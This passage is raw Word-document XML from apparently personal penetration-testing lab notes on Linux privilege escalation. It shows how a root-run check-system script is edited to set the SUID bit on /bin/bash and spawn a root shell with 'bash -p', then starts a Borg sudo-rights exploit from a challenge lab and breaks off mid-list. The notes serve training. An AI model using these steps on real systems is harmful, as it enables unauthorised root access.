      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we are guessing that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/check-system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> will re-run once we do the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shutdown</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and so we will edit the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">check-system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file to add </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bit to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so that we can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as root. The reason </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">check-system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is able to add the SUID bit to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is because the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">check-system </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file is likely run by root since it's owned by root. And we shutdown to activate this file. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F3A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F3B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F3C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1237"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, we can edit the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/check-system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file to add the SUID bit to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F3D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1237"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +s /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F3E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1237"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3986213" cy="1450113"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="253" name="image244.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image244.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId657"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3986213" cy="1450113"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1237"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nd then once we shutdown the machine using "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo shutdown -r now</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F40">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1237"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">T</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hen we can SSH back into the machine, and then run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/bash -p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to get a root shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F41">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F42">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F43">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F44">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F45">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_r0phz9sd8n48" w:id="268"/>
      <w:bookmarkEnd w:id="268"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Borg (/usr/bin/borg)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F46">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F47">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Borg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BorgBackup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">deduplicating backup program</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> built for efficiently and securely backing up files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F48">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F49">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4415451" cy="2535269"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="364" name="image351.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image351.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId658"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4415451" cy="2535269"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F4A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="412"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is cool to know, but not necessary for the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F4B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F4C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F4D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the Relia Challenge Lab on 172.16.xxx.19:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F4E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F4F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We first ran</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F50">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(ALL) NOPASSWD: /usr/bin/borg list *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F51">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(ALL) NOPASSWD: /usr/bin/borg extract *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F52">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(ALL) NOPASSWD: /usr/bin/borg mount *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F53">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F54">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is how we exploit:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F55">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More about Borg can be seen in the documentation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F56">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId659">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://borgbackup.readthedocs.io/en/stable/usage/extract.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F57">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get pspy64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F58">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x pspy64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./pspy64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001F5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
